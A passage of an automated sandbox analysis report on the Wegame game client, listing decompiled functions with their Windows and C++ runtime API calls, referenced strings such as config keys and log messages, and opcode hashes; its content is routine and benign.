                                                                • Opcode Fuzzy Hash: 66ae3af4bac3b09527487ac287c4726b2e01897328d985ca9958169fd0e37262
                                                                • Instruction Fuzzy Hash: 20B1A374A102A4CFDB24CF38CC84BA9B7B6AF46328F1042D9D65D9B291DB349E85DF11
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 6BD572D5
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD57A84
                                                                  • Part of subcall function 6BD19A0E: __EH_prolog3.LIBCMT ref: 6BD19A15
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 6BD57AD3
                                                                  • Part of subcall function 6BDAB9D8: __EH_prolog3_GS.LIBCMT ref: 6BDAB9DF
                                                                  • Part of subcall function 6BD1CEF4: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6BD1A734,?,00000004,6BD1A09E,?,1F5A0D44), ref: 6BD1CF53
                                                                • ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@Z.COMMON(?,?,?,?), ref: 6BD57B22
                                                                  • Part of subcall function 6BD46FC9: ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N3@Z.COMMON(?,?,?,00000001,00000000,?,6BD475CC,?,00000000,?,files,00000005), ref: 6BD46FD9
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                  • Part of subcall function 6BD45176: __EH_prolog3.LIBCMT ref: 6BD4517D
                                                                  • Part of subcall function 6BD474AD: __EH_prolog3_GS.LIBCMT ref: 6BD474B4
                                                                  • Part of subcall function 6BD0A3A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BD162D8,00000000,6BD16649,00000003,1F5A0D44,?,?,00000000,6BF764F4,000000FF,?,6BD15B05,00000000), ref: 6BD0A3E5
                                                                  • Part of subcall function 6BD56D1F: __EH_prolog3_GS.LIBCMT ref: 6BD56D29
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$H_prolog3_$?get_cfg@common@ierd_tgp@@H_prolog3U?$less@V12@V?$basic_ptree@Vpath@filesystem@2@memmove$?u8to16@common@ierd_tgp@@CurrentD@2@@std@@@2@@property_tree@boost@@@D@2@@std@@@2@@property_tree@boost@@_H_prolog3_catch_ThreadU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@4@@W@std@@_invalid_parameter_noinfo_noreturn
                                                                • String ID: .lazy$plugins
                                                                • API String ID: 3626403630-1263553738
                                                                • Opcode ID: 90a8ab78a84fc9d0e940eebf0cdcc0eb446530048ba1098f1a643b10dc9c18da
                                                                • Instruction ID: cd235a0053cbf51005e6142f208ea341ab96a93e00ee6368f64b9765cc3c232b
                                                                • Opcode Fuzzy Hash: 90a8ab78a84fc9d0e940eebf0cdcc0eb446530048ba1098f1a643b10dc9c18da
                                                                • Instruction Fuzzy Hash: 47428EB2C1229CDADB15CFA4C9447DDBBB4AF21318F6080ED95186B281DB781F88DF65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD83DE4
                                                                  • Part of subcall function 6BD83D5C: __EH_prolog3_GS.LIBCMT ref: 6BD83D63
                                                                  • Part of subcall function 6BD83D5C: memmove.VCRUNTIME140(?,?,00000010,?,00000018,6BD83E28,?,00000010), ref: 6BD83D9E
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD83E2E
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                • memset.VCRUNTIME140(?,00000000,00000040), ref: 6BD83EA7
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\machine_guid.cpp, xrefs: 6BD83E4F
                                                                • get_qm_report_guid failed, xrefs: 6BD83E66
                                                                • %02x, xrefs: 6BD83EBA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_$?get_log_instance@base@@H_prolog3H_prolog3_catch_Logger@1@memmovememset
                                                                • String ID: %02x$e:\dailybuild_dev\wegame_client\codes\common\src\machine_guid.cpp$get_qm_report_guid failed
                                                                • API String ID: 1511065185-4286905754
                                                                • Opcode ID: 93e5cde73b81094747e17837025d3a74941b38b032185fb4bdd999caf645cfec
                                                                • Instruction ID: 54a1d6bac014d4ba3ee016142dbfaecc85b332ec96e73831b941c2f7afb8b0e0
                                                                • Opcode Fuzzy Hash: 93e5cde73b81094747e17837025d3a74941b38b032185fb4bdd999caf645cfec
                                                                • Instruction Fuzzy Hash: D641F571904308AAEB25CFB8CC91BDDBB75FF14318F10019DD4096F292EB799A49CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9B012
                                                                  • Part of subcall function 6BD31899: _Mtx_lock.MSVCP140(00000000,?,?,6BD9B017,?,1F5A0D44,?,?,00000001,00000000,6BF8B63F,000000FF,?,6BD96570,00000001,6BD43A1D), ref: 6BD318A0
                                                                  • Part of subcall function 6BD31899: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6BD9B017,?,1F5A0D44,?,?,00000001,00000000,6BF8B63F,000000FF,?,6BD96570,00000001,6BD43A1D), ref: 6BD318AD
                                                                • memmove.VCRUNTIME140(?,00000000,?,1F5A0D44,?,?,00000001,00000000,6BF8B63F,000000FF,?,6BD96570,00000001,6BD43A1D,00000000,00000003), ref: 6BD9B02A
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9B057
                                                                  • Part of subcall function 6BD318B8: _Mtx_unlock.MSVCP140(?,?,?,6BD9B05C,?,?,?,00000002,00000000), ref: 6BD318BF
                                                                  • Part of subcall function 6BD318B8: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6BD9B05C,?,?,?,00000002,00000000), ref: 6BD318CC
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,00000002,00000000), ref: 6BD9B05D
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD2A76F: __EH_prolog3_GS.LIBCMT ref: 6BD2A776
                                                                  • Part of subcall function 6BD2F706: __EH_prolog3_GS.LIBCMT ref: 6BD2F70D
                                                                Strings
                                                                • [Qos_http_handler]report qos id= %d, xrefs: 6BD9B0A5
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp, xrefs: 6BD9B086
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: C_error@std@@Cnd_initH_prolog3_Throw_std::_$?get_log_instance@base@@H_prolog3Logger@1@Mtx_lockMtx_unlockmemmove
                                                                • String ID: [Qos_http_handler]report qos id= %d$e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp
                                                                • API String ID: 489467989-4170343553
                                                                • Opcode ID: c1e0e6d7f83c15e7f46d0532144e0c3ff300764aef34a634c065164ed5ca50bc
                                                                • Instruction ID: 6131bbed8526ec7bb5eb92a3cf900b5e39b1190b80945269811729a4df164281
                                                                • Opcode Fuzzy Hash: c1e0e6d7f83c15e7f46d0532144e0c3ff300764aef34a634c065164ed5ca50bc
                                                                • Instruction Fuzzy Hash: 9D41CE71904258AFCB09DFB4C851BEDBBB4EF05328F1041A9D515AB2C1DB799B05CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,00004EAE,1F5A0D44,?,?,?,?,6BF8B6C2,000000FF), ref: 6BD9B41B
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9B42A
                                                                  • Part of subcall function 6BD31899: _Mtx_lock.MSVCP140(00000000,?,?,6BD9B017,?,1F5A0D44,?,?,00000001,00000000,6BF8B63F,000000FF,?,6BD96570,00000001,6BD43A1D), ref: 6BD318A0
                                                                  • Part of subcall function 6BD31899: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6BD9B017,?,1F5A0D44,?,?,00000001,00000000,6BF8B63F,000000FF,?,6BD96570,00000001,6BD43A1D), ref: 6BD318AD
                                                                • memmove.VCRUNTIME140(?,-00000008,00004EAE), ref: 6BD9B457
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9B47F
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9B49C
                                                                • memmove.VCRUNTIME140(?,-00000008,00004EAE), ref: 6BD9B4CA
                                                                • std::_Cnd_initX.LIBCPMT ref: 6BD9B4F8
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Cnd_initstd::_$memmove$C_error@std@@Mtx_lockThrow_memset
                                                                • String ID:
                                                                • API String ID: 4086104158-0
                                                                • Opcode ID: e719f286e13af852c052041d41687fccd8f82c9c21057ee0f11648cacec26471
                                                                • Instruction ID: d0e67e6aca6b83f74152140a243c5c5d62a18d9cfecb9940624ac9b483887a42
                                                                • Opcode Fuzzy Hash: e719f286e13af852c052041d41687fccd8f82c9c21057ee0f11648cacec26471
                                                                • Instruction Fuzzy Hash: 9E4165B1D00269EADF14DB64DC85F89BBB8FF05314F1002E5E608AB1C1D7B95A458F65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD5F794
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(6BD43A1D,00000000,00000038,6BD94C44,?,?,?), ref: 6BD5F7BF
                                                                  • Part of subcall function 6BDAB9D8: __EH_prolog3_GS.LIBCMT ref: 6BDAB9DF
                                                                • GetFileVersionInfoSizeW.VERSION(00000000,00000000,00000038,6BD94C44,?,?,?), ref: 6BD5F7E5
                                                                  • Part of subcall function 6BD5F669: __EH_prolog3_catch.LIBCMT ref: 6BD5F670
                                                                  • Part of subcall function 6BD28DF0: __EH_prolog3_catch.LIBCMT ref: 6BD28DF7
                                                                • GetFileVersionInfoW.VERSION(00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,00000000,00000038,6BD94C44,?,?,?), ref: 6BD5F826
                                                                • VerQueryValueA.VERSION(?,6BFA5D78,?,00000034,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,00000000,00000038,6BD94C44), ref: 6BD5F83F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: FileH_prolog3_H_prolog3_catchInfoVersion$?u8to16@common@ierd_tgp@@D@2@@std@@D@std@@QuerySizeU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_ValueW@2@@4@@W@std@@
                                                                • String ID: 4
                                                                • API String ID: 3447756801-4088798008
                                                                • Opcode ID: d686ea33dd042b5bc3e137156ef4774c4dc0917edfb75ca277e4e63dc672115f
                                                                • Instruction ID: 69436352b2b3326c4e1f75c4b3d773289f9ebbed9c2a44217286bbc049717aa7
                                                                • Opcode Fuzzy Hash: d686ea33dd042b5bc3e137156ef4774c4dc0917edfb75ca277e4e63dc672115f
                                                                • Instruction Fuzzy Hash: 47316D75901249EECF04CFE4C5819EEBBB9AF18324F64406DE854FB250EB35AA45CB74
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDBA718
                                                                • SHCreateDirectoryExW.SHELL32(00000000,00000008,00000000,0000010C,6BD49EFB,?,?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200), ref: 6BDBA72F
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BDBA7A7
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6BDBA7CB
                                                                • create_directory_ex fail, error code:%1%, path:%2%, xrefs: 6BDBA74E
                                                                • [Sys_wrapper]%s, xrefs: 6BDBA7EB
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@CreateDirectoryH_prolog3_Logger@1@
                                                                • String ID: [Sys_wrapper]%s$create_directory_ex fail, error code:%1%, path:%2%$e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                                                • API String ID: 4165533739-2213886048
                                                                • Opcode ID: eb733254ae7971b69371266d68e40124cd8343ea6f887bd6ef51936b2da2762a
                                                                • Instruction ID: 8bee3e4605581d5453ff639839b6787ce2e00e38edbb28b37b2f21d010f4db57
                                                                • Opcode Fuzzy Hash: eb733254ae7971b69371266d68e40124cd8343ea6f887bd6ef51936b2da2762a
                                                                • Instruction Fuzzy Hash: 3521BFB1C00208DBDB29DB74CC56AEE77B4AF15728F10459CD4426B181EF78AB45CBB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD1C48E
                                                                  • Part of subcall function 6BD19A0E: __EH_prolog3.LIBCMT ref: 6BD19A15
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000000,user_setting.settings.common.last_uin,00000025,?,?,?,?,?,?,00000094), ref: 6BD1C4DA
                                                                  • Part of subcall function 6BD4702B: __EH_prolog3_catch_GS.LIBCMT ref: 6BD47035
                                                                  • Part of subcall function 6BD4702B: ?split_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV34@1@Z.COMMON(?,?,?), ref: 6BD4709A
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD1C598
                                                                  • Part of subcall function 6BD1776B: __EH_prolog3.LIBCMT ref: 6BD17772
                                                                  • Part of subcall function 6BD1776B: ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001,?,?,?,?,00000008,6BD1C504), ref: 6BD17789
                                                                Strings
                                                                • user_setting.settings.common.last_uin, xrefs: 6BD1C4C0
                                                                • [QQListFetcher]Get last login UIN: %llu success., xrefs: 6BD1C5D5
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\qqlistfetcher.cpp, xrefs: 6BD1C5BC
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$H_prolog3H_prolog3_catch_$?get_cfg_by_path@common@ierd_tgp@@?get_log_instance@base@@?split_path@common@ierd_tgp@@D@2@@std@@@2@@property_tree@boost@@_Init@locale@std@@Locimp@12@_Logger@1@U?$less@V12@V34@1@V?$basic_ptree@memmove
                                                                • String ID: [QQListFetcher]Get last login UIN: %llu success.$e:\dailybuild_dev\wegame_client\codes\common\src\qqlistfetcher.cpp$user_setting.settings.common.last_uin
                                                                • API String ID: 350412807-3646873806
                                                                • Opcode ID: 1cdac48fd9ef56d535d5f4fd00c6254b87658afbbdfcef2a48fc704244f7e1f9
                                                                • Instruction ID: 86ef7a5ba790d61d72962009ea3a4799e92275b6ff40ec1a061c2e4def9bee1f
                                                                • Opcode Fuzzy Hash: 1cdac48fd9ef56d535d5f4fd00c6254b87658afbbdfcef2a48fc704244f7e1f9
                                                                • Instruction Fuzzy Hash: 8631B131D14248EAEB14DBB8C885BDDBB706F15318F5480A8D1147B292EB785B4ACF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD1C614
                                                                  • Part of subcall function 6BD19A0E: __EH_prolog3.LIBCMT ref: 6BD19A15
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000000,user_setting.settings.common.last_wegame_id,0000002B,?,?,?,?,?,?,00000090), ref: 6BD1C65B
                                                                  • Part of subcall function 6BD4702B: __EH_prolog3_catch_GS.LIBCMT ref: 6BD47035
                                                                  • Part of subcall function 6BD4702B: ?split_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV34@1@Z.COMMON(?,?,?), ref: 6BD4709A
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD1C68B
                                                                  • Part of subcall function 6BD17657: __EH_prolog3.LIBCMT ref: 6BD1765E
                                                                  • Part of subcall function 6BD17657: ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001,?,?,?,?,00000008,6BD1C681), ref: 6BD17675
                                                                Strings
                                                                • [QQListFetcher]GetLastLoginedWegameId: {}, xrefs: 6BD1C6CD
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\qqlistfetcher.cpp, xrefs: 6BD1C6AF
                                                                • user_setting.settings.common.last_wegame_id, xrefs: 6BD1C641
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@$H_prolog3H_prolog3_catch_$?get_cfg_by_path@common@ierd_tgp@@?get_log_instance@base@@?split_path@common@ierd_tgp@@D@2@@std@@@2@@property_tree@boost@@_Init@locale@std@@Locimp@12@_Logger@1@U?$less@V12@V34@1@V?$basic_ptree@memmove
                                                                • String ID: [QQListFetcher]GetLastLoginedWegameId: {}$e:\dailybuild_dev\wegame_client\codes\common\src\qqlistfetcher.cpp$user_setting.settings.common.last_wegame_id
                                                                • API String ID: 350412807-312244829
                                                                • Opcode ID: e86ef43009dbbbfcfa304131c93267e011cd26487336f60fc32a9d48e9a0d242
                                                                • Instruction ID: 032c24cd06d43dcf520828cd7a5a767ce7f79939e0d6aaa1cb679ebed0430445
                                                                • Opcode Fuzzy Hash: e86ef43009dbbbfcfa304131c93267e011cd26487336f60fc32a9d48e9a0d242
                                                                • Instruction Fuzzy Hash: 1221E271D05208DADB14DFB8D892BDDBB706F15318F5440A8D1057F291DB794B4ADB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0045975A
                                                                • ?unsetf@ios_base@std@@QAEXH@Z.MSVCP140(00000001,00000018,0046A145,?,?,00000020,00000040,00000001,?,85A35C35,?,?,?,?,?,0047B8A9), ref: 0045977D
                                                                • ?fail@ios_base@std@@QBE_NXZ.MSVCP140(00000001,?,?,?,?,?,0047B8A9,000000FF), ref: 004597B3
                                                                • ?bad@ios_base@std@@QBE_NXZ.MSVCP140(?,?,?,?,?,0047B8A9,000000FF), ref: 004597C4
                                                                • _CxxThrowException.VCRUNTIME140(?,0049C838,error reading stream,?,?,?,?,?,0047B8A9,000000FF), ref: 00459800
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?bad@ios_base@std@@?fail@ios_base@std@@?unsetf@ios_base@std@@ExceptionH_prolog3Throw
                                                                • String ID: error reading stream
                                                                • API String ID: 37477595-137694921
                                                                • Opcode ID: 69214339061e56e01eb8840e37e220b3278fa4887b5ca34e666984b5f1dd0b23
                                                                • Instruction ID: 302e12700053926fe24509606de076a1cb89f16fc2c85d9e56eda33311c29ac4
                                                                • Opcode Fuzzy Hash: 69214339061e56e01eb8840e37e220b3278fa4887b5ca34e666984b5f1dd0b23
                                                                • Instruction Fuzzy Hash: B4215635A006059FCF04EFA9C959AADBBF1EF18304B14846EE449E7252CB389A45CB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Internet Explorer,00000000,00020019,?), ref: 6BDBBE09
                                                                • memset.VCRUNTIME140(?,00000000,00000104), ref: 6BDBBE2D
                                                                • RegQueryValueExA.KERNEL32(?,Version,00000000,?,?,?), ref: 6BDBBE56
                                                                • RegCloseKey.KERNEL32(?), ref: 6BDBBE62
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValuememset
                                                                • String ID: Software\Microsoft\Internet Explorer$Version
                                                                • API String ID: 1830152886-2486530099
                                                                • Opcode ID: b8f499f18f3953360486d643dba89dcac38f1e09ab2661bb2bf19e7e01396311
                                                                • Instruction ID: 217337a65135de06f55f589f251c40435b945643076e353b29da452ba16bf251
                                                                • Opcode Fuzzy Hash: b8f499f18f3953360486d643dba89dcac38f1e09ab2661bb2bf19e7e01396311
                                                                • Instruction Fuzzy Hash: 3F118E7690011CABDF15DF25CC45EDABB7CEB85304F0041D9AA49E7010DA749A89CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BDCF35D
                                                                • ?unsetf@ios_base@std@@QAEXH@Z.MSVCP140(00000001,00000018,6BDD1ACE,?,00000000,00000020,00000040,00000001,?,\mmog_data.xml,00000000,1F5A0D44,00000000,00000000,6BD43A1D), ref: 6BDCF380
                                                                • ?fail@ios_base@std@@QBE_NXZ.MSVCP140(?,?,?,00000000,00000001,?,00000000,6BF92607,000000FF,?,6BDD06F1,00000000,?), ref: 6BDCF3B6
                                                                • ?bad@ios_base@std@@QBE_NXZ.MSVCP140(?,00000000,6BF92607,000000FF,?,6BDD06F1,00000000,?), ref: 6BDCF3C7
                                                                • _CxxThrowException.VCRUNTIME140(?,6C062C5C,error reading stream,?,00000000,6BF92607,000000FF,?,6BDD06F1,00000000,?), ref: 6BDCF403
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?bad@ios_base@std@@?fail@ios_base@std@@?unsetf@ios_base@std@@ExceptionH_prolog3Throw
                                                                • String ID: error reading stream
                                                                • API String ID: 37477595-137694921
                                                                • Opcode ID: 501a3b880bdd0227d4ed5f3609f221c7ab62b6da0d79b99ab71675df73cf704d
                                                                • Instruction ID: f15bd7a93b5f9be93eebadf3949dd9644374eb81fb724414889f87be1f5e7c6a
                                                                • Opcode Fuzzy Hash: 501a3b880bdd0227d4ed5f3609f221c7ab62b6da0d79b99ab71675df73cf704d
                                                                • Instruction Fuzzy Hash: 2421AC75A102059FCF05DFB8C984A9DBBF5BF18314B14845DE059EB261CB39EA05CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDAF186
                                                                • GetSystemTimes.KERNEL32(6C09A294,6C09A29C,DgI.,00000050), ref: 6BDAF19C
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(6C09A294,6C09A29C,DgI.,00000050), ref: 6BDAF1A5
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6BDAF1C9
                                                                • DgI., xrefs: 6BDAF18D
                                                                • error, xrefs: 6BDAF1DD
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_H_prolog3_catch_Logger@1@SystemTimes
                                                                • String ID: DgI.$e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp$error
                                                                • API String ID: 1984077098-1526617941
                                                                • Opcode ID: edfe9072d809c16fe76344eba6b10020d074c6d5dea0dccc1a676af3ba791faa
                                                                • Instruction ID: d46da29044824568257b380932f26022ee85d15f2aff8ee0ca8f6146f455348e
                                                                • Opcode Fuzzy Hash: edfe9072d809c16fe76344eba6b10020d074c6d5dea0dccc1a676af3ba791faa
                                                                • Instruction Fuzzy Hash: 50F04030E40201ABC718A7B4DC12FAD33A04F50B28F300188E9157F2C0EF7EDA02A7A2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD310A4
                                                                • WaitForSingleObject.KERNEL32(?,000000C8,?,00000078), ref: 6BD31105
                                                                • ResetEvent.KERNEL32(?), ref: 6BD3111E
                                                                • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,?), ref: 6BD3122A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: EventH_prolog3_ObjectResetSingleWaitXbad_function_call@std@@
                                                                • String ID:
                                                                • API String ID: 2241382284-0
                                                                • Opcode ID: 09eddb0c18035e9ba4e8abe9c0e0bbd46b3eeeafddf564d88c139a46cceda1a8
                                                                • Instruction ID: 550461b84213fcc73f9980e4c7c29982dcffa782e8b5c1f5378858fff09327c6
